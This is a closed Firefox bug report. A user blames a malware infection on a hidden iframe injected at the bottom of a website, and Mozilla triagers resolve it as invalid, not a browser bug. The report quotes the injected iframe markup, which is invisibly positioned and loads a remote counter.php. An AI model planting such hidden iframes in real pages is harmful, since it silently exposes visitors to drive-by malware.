Note: There are a few cases of duplicates in user autocompletion which are being worked on.

firefox 12.0 got hacked. i visited site, site had weird code, installed software

RESOLVED INVALID

Status

()

Firefox
Untriaged
RESOLVED INVALID
5 years ago
5 years ago

People

(Reporter: nathan, Unassigned)

Tracking

12 Branch
x86
Windows 7
Points:
---

Firefox Tracking Flags

(Not tracked)

Details

(Reporter)

Description

5 years ago
User Agent: Mozilla/5.0 (Windows NT 6.1; rv:12.0) Gecko/20100101 Firefox/12.0
Build ID: 20120420145725

Steps to reproduce:

visited : http://proxyrental.net/

they have some weird code on the very bottom of the site.. that loads an iframe called counter.php.. this code doens't seem legit. I have found a hack reference to this counter.php

http://forums.whirlpool.net.au/archive/1924864

This would be this hack is pretty serious, no? All users.... someone is probably mass hacking now


Actual results:

visited : http://proxyrental.net/

they have some weird code on the very bottom of the site.. that loads an iframe called counter.php.. this code doens't seem legit. I have found a hack reference to this counter.php

http://forums.whirlpool.net.au/archive/1924864

This would be this hack is pretty serious, no? All users.... someone is probably mass hacking now


Expected results:

visited : http://proxyrental.net/

they have some weird code on the very bottom of the site.. that loads an iframe called counter.php.. this code doens't seem legit. I have found a hack reference to this counter.php

http://forums.whirlpool.net.au/archive/1924864

This would be this hack is pretty serious, no? All users.... someone is probably mass hacking now
</html><iframe src="http://proxyrental.net/counter.php" style="visibility: hidden; position: absolute; left: 0px; top: 0px" width="10" height="10"/>

Is the code in question - I don't see an attack vector here. removing the security flag.
Group: core-security
(Reporter)

Comment 2

5 years ago
> Is the code in question - I don't see an attack vector here.

It is an attack vector. The link I posted shows that code is the implementation of a mass hack. Note iframe is installed below /html

counter.php code is loading browser detecting exploit code of some kindof I would suspect. It installed a trojan somehow
This is not a Firefox bug. All kinds of sites get infected with malware all of the time. There is nothing for us to do here unless you have a pointer to a way that code is being installed into/through Firefox without you doing anything.
Status: UNCONFIRMED → RESOLVED
Last Resolved: 5 years ago
Resolution: --- → INVALID
You need to log in before you can comment on or make changes to this bug.